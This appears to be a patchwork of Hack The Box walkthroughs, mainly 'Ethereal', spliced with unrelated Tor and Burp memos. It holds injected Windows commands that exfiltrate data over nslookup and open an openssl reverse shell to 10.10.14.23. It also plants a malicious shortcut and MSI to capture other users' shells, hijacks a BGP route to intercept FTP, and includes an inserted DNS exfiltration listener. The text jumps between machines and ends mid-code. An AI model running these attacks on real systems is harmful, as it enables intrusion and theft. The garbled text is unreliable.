We can find a login page at /admin on port 9999.
The login form is validated by client-side JavaScript in "/admin/js/login.js", and the password "superduperlooperpassword_lol" is hard-coded in it, so anyone who fetches the script can read it.
root@kali:~# curl http://10.10.10.111:9999/admin/js/login.js
var attempt = 3; // Variable to count number of attempts.
// Below function Executes on click of login button.
function validate(){
    var username = document.getElementById("username").value;
    var password = document.getElementById("password").value;
    if( username == "admin" && password == "superduperlooperpassword_lol"){
        alert ("Login successfully");
        window.location = "success.html"; // Redirecting to other page.
        return false;
    }else{
        attempt --; // Decrementing by one.
        alert("You have left "+attempt+" attempt;");
        // Disabling fields after 3 attempts.
        if( attempt == 0){
            document.getElementById("username").disabled = true;
            document.getElementById("password").disabled = true;
            document.getElementById("submit").disabled = true;
            return false;
        }
    }
}
On the page it redirects to, "/admin/success.html", there is an "encrypted message".
By itself it does not make any sense, but we can use an online decoder to interpret it.
The decoded text gives us a hint: let's try /asdiSIAJJ0QWE9JAS.
That page contains a base64-encoded message.
We can find out what it is with the following commands.
root@kali:~# echo -n UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwABBAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbsK1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmveEMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTjlurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkCAAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUGAAAAAAEAAQBPAAAAAwEAAAAA | base64 -d > b64file
root@kali:~# file b64file
b64file: Zip archive data, at least v2.0 to extract
So we have a .zip file. It is password protected, but the password is easily guessable: "password".
Debugging the binary with gdb, we can see that execution fails because the program tried to jump to the address "0x62413762", which is not mapped.
root@kali:~# gdb rop
GNU gdb (Debian 8.2.1-2) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from rop...(no debugging symbols found)...done.
(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Starting program: /root/rop Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Program received signal SIGSEGV, Segmentation fault.
0x62413762 in ?? ()
This address "0x62413762" is made of bytes from our pattern. Using "pattern_offset.rb", we learn that the saved return address is overwritten after 52 bytes, i.e. the offset is 52.
root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x62413762
[*] Exact match at offset 52
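The offset lookup above can be reproduced without Metasploit. The following is an added example (not from the original write-up): a Python re-implementation of the cyclic pattern and of the search that pattern_offset.rb performs, which maps the crashing address 0x62413762 back to offset 52. The function names are my own.

```python
import string

# Added example (not from the original write-up): a Metasploit-style cyclic
# pattern generator and offset finder, equivalent to pattern_create.rb /
# pattern_offset.rb, so the "0x62413762 -> offset 52" step can be reproduced
# without Metasploit installed.

def pattern_create(length):
    """Return the first `length` bytes of the Aa0Aa1...Az9Ba0... pattern.

    Every 4-byte window is unique within the full 20280-byte cycle, which is
    what lets a crashing 32-bit return address be mapped back to an offset.
    """
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(value, length=20280):
    """Locate `value` in the pattern and return its offset (-1 if absent).

    `value` may be the crashing address as an int (e.g. 0x62413762 from gdb)
    or the raw text seen in the register. An int is converted to the byte
    order it had in memory: little-endian, 4 bytes for a 32-bit address,
    8 bytes for a 64-bit one. 0x62413762 becomes b"b7Ab", found at offset 52.
    """
    pattern = pattern_create(length).encode("ascii")
    if isinstance(value, int):
        width = 4 if value <= 0xFFFFFFFF else 8
        needle = value.to_bytes(width, "little")
    else:
        needle = value.encode("ascii")
    return pattern.find(needle)


if __name__ == "__main__":
    print(pattern_create(100))                    # what was passed to `run` in gdb
    print("offset:", pattern_offset(0x62413762))  # 52, matching pattern_offset.rb
```

The little-endian conversion is the part people get wrong by hand: the register shows 0x62413762, but the bytes in the buffer are "b7Ab", and that is the string to search for.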
Next, we need to know where "libc.so.6" is loaded.
Hack The Box is a website that hosts a bunch of vulnerable machines in its own VPN.
This is a write-up of "Ethereal".
Solution:
1. Initial Enumeration
TCP Port scanning:
root@kali:~# nmap -p- 10.10.10.106 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-07 19:56 EET
Stats: 0:20:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 75.77% done; ETC: 20:23 (0:06:33 remaining)
Nmap scan report for 10.10.10.106
Host is up (0.12s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV IP 172.16.249.135 is not the same as 10.10.10.106
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ethereal
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1628.08 seconds
FTP enumeration:
root@kali:~# ftp 10.10.10.106
Connected to 10.10.10.106.
220 Microsoft FTP Service
Name (10.10.10.106:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
07-10-18 09:03PM <DIR> binaries
09-02-09 08:58AM 4122 CHIPSET.txt
01-12-03 08:58AM 1173879 DISK1.zip
01-22-11 08:58AM 182396 edb143en.exe
01-18-11 11:05AM 98302 FDISK.zip
07-10-18 08:59PM <DIR> New folder
07-10-18 09:38PM <DIR> New folder (2)
07-09-18 09:23PM <DIR> subversion-1.10.0
11-12-16 08:58AM 4126 teamcity-server-log4j.xml
226 Transfer complete.
Trying each of the patterns, we find the following credential, which lets us log in at ethereal.htb:8080:
alan:!C414m17y57r1k3s4g41n!
It looks like the "ping" command is executed internally.
So we try OS command injection by appending a Windows command to the value in the textbox and submitting it.
We can easily confirm that the injection works with the following input:
127.0.0.1 & ping 10.10.14.23
We can confirm the result with tcpdump:
root@kali:~# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
18:51:03.070436 IP ethereal.htb > kali: ICMP echo request, id 1, seq 17, length 40
18:51:03.070476 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 17, length 40
18:51:04.222480 IP ethereal.htb > kali: ICMP echo request, id 1, seq 18, length 40
18:51:04.222522 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 18, length 40
18:51:05.231877 IP ethereal.htb > kali: ICMP echo request, id 1, seq 19, length 40
18:51:05.231910 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 19, length 40
18:51:06.875927 IP ethereal.htb > kali: ICMP echo request, id 1, seq 20, length 40
18:51:06.875966 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 20, length 40
To get data out, we can make the target resolve a name against our host with the following command, and catch the query with Responder:
127.0.0.1 & nslookup test 10.10.14.23
root@kali:~# responder -I tun0
~~~
[+] Listening for events...
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .test
We can execute an OS command and exfiltrate its output with the following command:
# 10.10.14.23 & for /f %i in ('whoami') do nslookup %i 10.10.14.23
[+] Listening for events...
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .etherealalan
From here, we can carry on with enumeration.
For example, the current directory is "C:\windows\system32\inetsrv":
# 10.10.14.23 & for /f %i in ('cd') do nslookup %i 10.10.14.23
[+] Listening for events...
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .c.windowssystem32inetsrv
User enumeration:
# 10.10.14.23 & for /f %i in ('dir /B "C:\Users"') do nslookup %i 10.10.14.23
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Administrator
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .alan
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .jorge
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Public
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .rupal
Installed Program enumeration:
# 10.10.14.23 & for /f %i in ('dir /B "C:\Program Files (x86)"') do nslookup %i 10.10.14.23
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Common
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Internet
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Microsoft
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Microsoft
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Microsoft.NET
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .MSBuild
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .OpenSSL.v1.1.0
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Reference
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Windows
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Windows
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Windows
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Windows
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Windows
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Windows
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Windows
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .WindowsPowerShell
The interesting detail is that OpenSSL v1.1.0 is installed on the target.
# 10.10.14.23 & netsh advfirewall firewall show rule name=all | findstr "Rule Name:" > C:\Users\Public\Desktop\Shortcuts\fw.txt
# 10.10.14.23 & for /f %i in ('dir /B "C:\Users\Public\Desktop\Shortcuts"') do nslookup %i 10.10.14.23
# 10.10.14.23 & for /f "tokens=1,2,3,4,5,6,7,8" %a in ('type C:\users\public\desktop\shortcuts\fw.txt') do nslookup %a.%b.%c.%d.%e.%f.%g.%h 10.10.14.23
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Request
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.UDP.Port.53
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.TCP.Ports.73.136
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.Port.80.8080
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Request
[*][DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply
According to these rules, TCP ports 73 and 136 are allowed through the firewall, so we have two ports we can use for a connection.
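Here is what the receiving end of this channel is doing, as an added example that is not part of the original write-up and is not Responder's code: a small Python DNS listener that extracts the queried name from each packet and answers with a fixed A record, plus a helper that shapes a line of command output into a valid DNS name the way the for /f token trick above does by hand. The IP 10.10.14.23, port 53 and the sample names are assumptions for the demo; it would run as root on the attacking host in place of Responder.

```python
import re
import socket
import struct

# Added example (not part of the original write-up): the receiving side of the
# nslookup exfiltration channel. It does what Responder's DNS listener did for
# us: read the QNAME out of each query, print it, and send an A record back so
# nslookup on the victim is satisfied. Addresses, port and sample inputs are
# assumptions for the demo.

def to_dns_name(line, max_label=63, max_name=253):
    """Shape one line of command output into a valid DNS name.

    Mirrors the `for /f "tokens=1,...,8"` trick: each token becomes a label
    joined by '.', characters outside [A-Za-z0-9-] are dropped (so
    C:\\windows\\system32 arrives as cwindowssystem32), tokens longer than
    63 bytes are split, and the whole name is capped at 253 bytes.
    """
    labels = []
    for token in line.split():
        token = re.sub(r"[^A-Za-z0-9-]", "", token)
        while token:
            labels.append(token[:max_label])
            token = token[max_label:]
    return ".".join(labels)[:max_name]


def build_query(name, txid=0x1337):
    """Build the A query nslookup would send (constructed test input)."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split("."))
    return header + qname + b"\x00" + struct.pack(">HH", 1, 1)


def parse_query_name(pkt):
    """Return the dotted QNAME of the first question in a DNS packet."""
    if struct.unpack(">H", pkt[4:6])[0] < 1:
        raise ValueError("no question section")
    pos, labels = 12, []
    while True:
        length = pkt[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer in question name")
        labels.append(pkt[pos:pos + length].decode("ascii", "replace"))
        pos += length
    return ".".join(labels)


def build_answer(query, ip):
    """Answer any query with one A record for `ip` (Responder's 'Poisoned
    answer'): same txid, response flags set, question echoed back."""
    pos = 12
    while query[pos] != 0:
        pos += 1 + query[pos]
    question = query[12:pos + 1 + 4]
    header = query[:2] + struct.pack(">HHHHH", 0x8180, 1, 1, 0, 0)
    rdata = bytes(int(o) for o in ip.split("."))
    answer = b"\xC0\x0C" + struct.pack(">HHIH", 1, 1, 60, len(rdata)) + rdata
    return header + question + answer


def serve(bind="0.0.0.0", port=53, answer_ip="10.10.14.23"):
    """Listen on UDP/53 and print each exfiltrated name (needs root for :53)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.bind((bind, port))
        while True:
            pkt, peer = sock.recvfrom(512)
            try:
                name = parse_query_name(pkt)
            except (ValueError, IndexError):
                continue
            print(f"[DNS] {peer[0]} asked for: {name}")
            sock.sendto(build_answer(pkt, answer_ip), peer)


if __name__ == "__main__":
    serve()
```

The label and name limits are the practical ceiling of this channel: anything past 63 bytes per token or 253 bytes per line never reaches us, which is why long output (the firewall rules above) has to be split into tokens or written to a file and read back piecewise.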
Next, we try to get a remote connection over them. First, generate a self-signed certificate for our SSL listener:
root@kali:~# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Generating a RSA private key
.................................................................................................................................++++
..........................++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code)[AU]:
State or Province Name (full name)[Some-State]:
Locality Name (eg, city)[]:
Organization Name (eg, company)[Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section)[]:
Common Name (e.g. server FQDN or YOUR name)[]:
Email Address []:
root@kali:~# ls -la
-rw-r--r-- 1 root root 1939 Mar 10 13:25 cert.pem
-rw------- 1 root root 3272 Mar 10 13:24 key.pem
Then inject the following into the ping textbox. The ping output is piped into an openssl.exe s_client connected to our port 73, whose stdout (whatever we type on that server) feeds cmd.exe, and the command output is sent through a second s_client to our port 136. Both legs are TLS, so the firewall only sees allowed ports with encrypted traffic:
# 10.10.14.23 | "C:\Program Files (x86)\OpenSSL-v1.1.0\bin\openssl.exe" s_client -quiet -connect 10.10.14.23:73 | cmd.exe | "C:\Program Files (x86)\OpenSSL-v1.1.0\bin\openssl.exe" s_client -quiet -connect 10.10.14.23:136
root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 73
Pinging 10.10.14.23 with 32 bytes of data:
Reply from 10.10.14.23: bytes=32 time=34ms TTL=63
Reply from 10.10.14.23: bytes=32 time=38ms TTL=63
Ping statistics for 10.10.14.23:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 34ms, Maximum = 38ms, Average = 36ms
root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 136
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>
After that, by writing a command in the terminal connected on port 73 and refreshing the page, we can execute our commands and read the output in the port 136 terminal.
Volume in drive C has no label.
Volume Serial Number is FAD9-1FD5
Directory of C:\users\alan\desktop
07/07/2018 11:08 PM <DIR> .
07/07/2018 11:08 PM <DIR> ..
07/07/2018 11:07 PM 160 note-draft.txt
1 File(s) 160 bytes
2 Dir(s) 15,437,340,672 bytes free
There is no user.txt in C:\Users\alan\desktop.
However, there is an interesting text file.
c:\windows\system32\inetsrv>type C:\users\alan\desktop\note-draft.txt
I've created a shortcut for VS on the Public Desktop to ensure we use the same version. Please delete any existing shortcuts and use this one instead.
- Alan
c:\windows\system32\inetsrv>dir C:\users\public\desktop\shortcuts
Volume in drive C has no label.
Volume Serial Number is FAD9-1FD5
Directory of C:\users\public\desktop\shortcuts
03/10/2019 11:01 AM <DIR> .
03/10/2019 11:01 AM <DIR> ..
03/10/2019 11:02 AM 2,494 fw.txt
07/06/2018 02:28 PM 6,125 Visual Studio 2017.lnk
2 File(s) 8,619 bytes
2 Dir(s) 15,436,517,376 bytes free
To take advantage of this, we create a malicious shortcut that gives us a shell as the user who opens it.
We can generate it with LNKUp.
After that, run the SSL server on port 136 again, this time feeding it vs-mod.lnk on stdin.
This prints nothing in the console, but that is expected.
root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 136 < vs-mod.lnk
# then, run the following payload in the web ping console to upload the shortcut
# 10.10.14.23 | "C:\Program Files (x86)\OpenSSL-v1.1.0\bin\openssl.exe" s_client -quiet -connect 10.10.14.23:136 > "C:\Users\Public\Desktop\Shortcuts\vs-mod.lnk"
After that, we can confirm that vs-mod.lnk is in the Shortcuts folder.
c:\windows\system32\inetsrv>dir c:\users\public\desktop\shortcuts
Volume in drive C has no label.
Volume Serial Number is FAD9-1FD5
Directory of c:\users\public\desktop\shortcuts
03/10/2019 12:28 PM <DIR> .
03/10/2019 12:28 PM <DIR> ..
03/10/2019 11:02 AM 2,494 fw.txt
07/06/2018 02:28 PM 6,125 Visual Studio 2017.lnk
03/10/2019 12:26 PM 520 vs-mod.lnk
3 File(s) 9,139 bytes
2 Dir(s) 15,435,431,936 bytes free
Then, replace "Visual Studio 2017.lnk" with our "vs-mod.lnk":
# send this command through the openssl server listening on port 73
del "c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk" & copy /Y "c:\users\public\desktop\shortcuts\vs-mod.lnk" "c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk" & dir c:\users\public\desktop\shortcuts
c:\windows\system32\inetsrv>dir c:\users\public\desktop\shortcuts
Volume in drive C has no label.
Volume Serial Number is FAD9-1FD5
Directory of c:\users\public\desktop\shortcuts
03/10/2019 12:39 PM <DIR> .
03/10/2019 12:39 PM <DIR> ..
03/10/2019 11:02 AM 2,494 fw.txt
03/10/2019 12:26 PM 520 Visual Studio 2017.lnk
03/10/2019 12:26 PM 520 vs-mod.lnk
3 File(s) 3,534 bytes
2 Dir(s) 15,435,128,832 bytes free
Right after that, start both SSL servers again.
A few minutes later, the shortcut is opened and we get a shell as user "jorge".
As always, user.txt is on the desktop.
root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 136
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\jorge\Documents>whoami
whoami
ethereal\jorge
C:\Users\jorge\Documents>type C:\Users\jorge\desktop\user.txt
2b9a4ca09408b4a39d87cbcd7bd524dd
3. Getting Root
If we check the drives on Ethereal, we find an additional drive "D:".
C:\Users\jorge\Documents>fsutil fsinfo drives
Drives: C:\ D:\
C:\Users\jorge\Documents>dir D:\
Volume in drive D is Development
Volume Serial Number is 54E5-37D1
Directory of D:\
07/07/2018 09:50 PM <DIR> Certs
06/27/2018 10:30 PM <DIR> DEV
07/16/2018 09:54 PM <DIR> Program Files (x86)
06/30/2018 09:05 PM <DIR> ProgramData
0 File(s) 0 bytes
4 Dir(s) 8,437,514,240 bytes free
We can find an interesting note in D:\DEV\MSIs.
C:\Users\jorge\Documents>type D:\DEV\MSIs\note.txt
Please drop MSIs that need testing into this folder - I will review regularly. Certs have been added to the store already.
- Rupal
It sounds like we have to create an MSI file that executes our payload.
Beforehand, we need a certificate to sign our MSI file.
We can find the certificates in D:\Certs.
Then, we run the following commands to build the MSI.
The resulting "ethereal.msi" ends up in "C:\Program Files\WiX Toolset v3.11\bin", the directory we run the tools from.
C:\Program Files\WiX Toolset v3.11\bin>candle.exe c:\tmp\ethereal.wxs
Windows Installer XML Toolset Compiler version 3.11.1.2318
Copyright (c) .NET Foundation and contributors. All rights reserved.
ethereal.wxs
C:\Program Files\WiX Toolset v3.11\bin>light.exe ethereal.wixobj
Windows Installer XML Toolset Linker version 3.11.1.2318
Copyright (c) .NET Foundation and contributors. All rights reserved.
c:\tmp\ethereal.wxs(6) : warning LGHT1079 : The cabinet 'product.cab' does not contain any files. If this installation contains no files, this warning can likely be safely ignored. Otherwise, please add files to the cabinet or remove it.
c:\tmp\ethereal.wxs(10) : error LGHT0204 : ICE18: KeyPath for Component: 'ApplicationFiles' is Directory: 'INSTALLLOCATION'. The Directory/Component pair must be listed in the CreateFolders table.
Sign the MSI file:
First, we have to install the Windows SDK.
Then, we have to base64-decode the .cer file and the .pvk file.
Decode MyCA.cer:
After that, we upload the MSI file the same way we uploaded vs-mod.lnk.
C:\Users\jorge\Documents>copy c:\users\public\desktop\shortcuts\ethereal.msi d:\dev\msis\ethereal.msi & dir d:\dev\msis
1 file(s) copied.
Volume in drive D is Development
Volume Serial Number is 54E5-37D1
Directory of d:\dev\msis
03/21/2019 11:25 AM <DIR> .
03/21/2019 11:25 AM <DIR> ..
03/21/2019 10:34 AM 663,552 ethereal.msi
07/18/2018 09:47 PM 133 note.txt
2 File(s) 663,685 bytes
2 Dir(s) 8,436,850,688 bytes free
All we have to do now is start the SSL servers again and wait a couple of minutes.
Someone then executes the uploaded MSI and we get a shell as "rupal", whose desktop holds root.txt.
root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 136
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\>whoami
ethereal\rupal
C:\>dir c:\users\rupal\desktop
Volume in drive C has no label.
Volume Serial Number is FAD9-1FD5
Directory of c:\users\rupal\desktop
10/10/2018 05:16 <DIR> .
10/10/2018 05:16 <DIR> ..
04/07/2018 22:01 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 15,406,366,720 bytes free
C:\>type c:\users\rupal\desktop\root.txt
1cb6f1fc220e3f2fcc0e3cd8e2d9906f
How to install Tor Browser on Kali Linux (not manually).
If we install Tor Browser manually, it runs as the root user.
Besides, that is not a good way to maintain it.
How to install the Burp SSL certificate in Chrome.
I have done this more than 5 times but still forget it, so I took this memo.
Solution
1. SSL Error
Without any settings, if we use Burp with HTTPS, the browser shows a certificate error.
2. Download the SSL cert
By opening the Burp page on localhost, we can download the certificate "cacert.der".
We have to click on the button "CA Certificate".
3. Register the cert in Google Chrome
Go to Settings and click "Advanced". There is a menu "Manage certificates".
Click "Authorities", then "Import".
After selecting the downloaded "cacert.der", it shows some options.
Choosing only the first one, "Trust this certificate for identifying websites", is enough.
4. Restart
Then restart Chrome and it should work.
5. Still the same error?
In that case, we can check the validity of the certificate under "Manage certificates".
Click on "org-PortSwigger"; the certificate is probably shown as "untrusted".
We can edit the certificate, or delete it and import it again.
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.23] from (UNKNOWN)[10.10.10.105] 51590
bash: cannot set terminal process group (2281): Inappropriate ioctl for device
bash: no job control in this shell
root@r1:~#
It looks like we got a root shell. However, we cannot find root.txt anywhere.
This is because we are not on 10.10.10.105 itself.
On the ticket page, we can find some info about this network.
We already know that Quagga is running on this server.
By enumeration, we can find additional servers related to this one.
At the same time, we can assume this server is running BGP, so BGP hijacking is a possible way forward.
r1# show ip bgp
show ip bgp
BGP table version is 0, local router ID is 10.255.255.1
Status codes: s suppressed, d damped, h history, * valid, > best, = multipath,
i internal, r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete
Network Next Hop Metric LocPrf Weight Path
*> 10.78.10.0/24 0.0.0.0 0 32768 ?
*> 10.78.11.0/24 0.0.0.0 0 32768 ?
*> 10.99.64.0/24 0.0.0.0 0 32768 ?
* 10.100.10.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.11.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.12.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.13.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.14.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.15.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.16.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.17.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.18.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.19.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
* 10.100.20.0/24 10.78.11.2 0 300 200 i
*> 10.78.10.2 0 0 200 i
*> 10.101.8.0/21 0.0.0.0 0 32768 i
*> 10.101.16.0/21 0.0.0.0 0 32768 i
*> 10.120.10.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.11.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.12.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.13.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.14.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.15.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.16.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.17.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.18.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.19.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
*> 10.120.20.0/24 10.78.11.2 0 0 300 i
* 10.78.10.2 0 200 300 i
Total number of prefixes 27
Traffic to the FTP server "10.120.15.10" (in 10.120.15.0/24) follows the best route via next hop 10.78.11.2, which is reached through eth2.
So we try to capture the FTP traffic by attracting it to r1.
BGP configuration:
root@r1:~# vtysh
vtysh
Hello, this is Quagga (version 0.99.24.1).
Copyright 1996-2005 Kunihiro Ishiguro, et al.
r1# conf t
conf t
r1(config)# router gbp 100
router gbp 100
% Unknown command.
r1(config)# router bgp 100
router bgp 100
r1(config-router)# network 10.120.15.0/25
network 10.120.15.0/25
r1(config-router)# end
end
r1# exit
Then, assign the FTP server's address to eth2 so that r1 answers for it:
root@r1:~# ifconfig eth2 10.120.15.10 netmask 255.255.255.0 up
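Why announcing a /25 wins over the legitimate /24, as an added example that is not part of the original write-up: a Python model of the longest-prefix-match decision over a constructed subset of the table shown above. Prefixes and next hops are taken from that output; the functions and the RIB list are my own.

```python
import ipaddress

# Added example (not from the original write-up): why announcing 10.120.15.0/25
# from r1 steals the FTP traffic. BGP picks the most specific matching prefix
# before it even looks at AS path, so a /25 originated in AS 100 beats the
# legitimate /24 learned from AS 300. The RIB below is a constructed subset of
# r1's `show ip bgp` table as (prefix, next hop, AS path); a next hop of
# "0.0.0.0" marks a locally originated route.

RIB = [
    ("10.78.10.0/24",  "0.0.0.0",    []),
    ("10.78.11.0/24",  "0.0.0.0",    []),
    ("10.100.10.0/24", "10.78.10.2", [200]),
    ("10.120.15.0/24", "10.78.11.2", [300]),
    ("10.120.15.0/24", "10.78.10.2", [200, 300]),
]


def best_route(rib, dst):
    """Longest-prefix match, then shortest AS path, as a simplified BGP
    decision. Returns (network, next_hop, as_path) or None."""
    dst = ipaddress.ip_address(dst)
    candidates = [
        (ipaddress.ip_network(prefix), next_hop, path)
        for prefix, next_hop, path in rib
        if dst in ipaddress.ip_network(prefix)
    ]
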